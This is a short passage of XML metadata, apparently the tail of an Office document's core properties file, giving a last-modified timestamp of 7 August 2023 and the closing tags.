  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-07T01:26:44Z</dcterms:modified>
</cp:coreProperties>
</file>